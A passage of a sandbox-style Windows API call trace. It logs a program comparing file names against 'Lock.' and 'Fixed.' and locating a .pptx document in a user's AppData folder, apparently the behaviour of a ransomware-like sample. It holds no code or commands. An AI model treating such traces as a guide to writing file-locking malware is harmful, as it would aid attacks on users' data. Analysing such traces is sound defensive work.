lpString2="Lock.", cchCount2=5) returned 1 [0205.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gfFJ vK4z9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fFJ vK4z9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FJ vK4z9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J vK4z9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" vK4z9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vK4z9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K4z9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4z9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.008] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0206.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0206.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OjU _gfFJ vK4z9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jU _gfFJ vK4z9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U _gfFJ vK4z9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" _gfFJ vK4z9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_gfFJ vK4z9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gfFJ vK4z9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fFJ vK4z9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FJ vK4z9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J vK4z9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" vK4z9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vK4z9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K4z9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4z9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.009] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0206.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0206.009] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0206.009] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0206.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0206.010] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0206.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0206.010] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0206.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0206.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.010] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0206.010] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0206.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0206.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.011] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/OjU _gfFJ vK4z9.pptx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb8167bd0, ftCreationTime.dwHighDateTime=0x1d4c968, ftLastAccessTime.dwLowDateTime=0x87eb4c50, ftLastAccessTime.dwHighDateTime=0x1d4d558, ftLastWriteTime.dwLowDateTime=0x87eb4c50, ftLastWriteTime.dwHighDateTime=0x1d4d558, nFileSizeHigh=0x0, nFileSizeLow=0x16b6c, dwReserved0=0xa2b0039, dwReserved1=0x1907a, cFileName="OjU _gfFJ vK4z9.pptx", cAlternateFileName="OJU_GF~1.PPT")) returned 0xaa59a0 [0206.011] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0206.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.012] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0206.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0206.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.014] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.014] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0206.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0206.014] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.014] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.015] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.015] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.015] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0206.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.016] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0206.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.016] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.017] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.017] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.018] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0206.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0206.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.019] HeapFree (in: 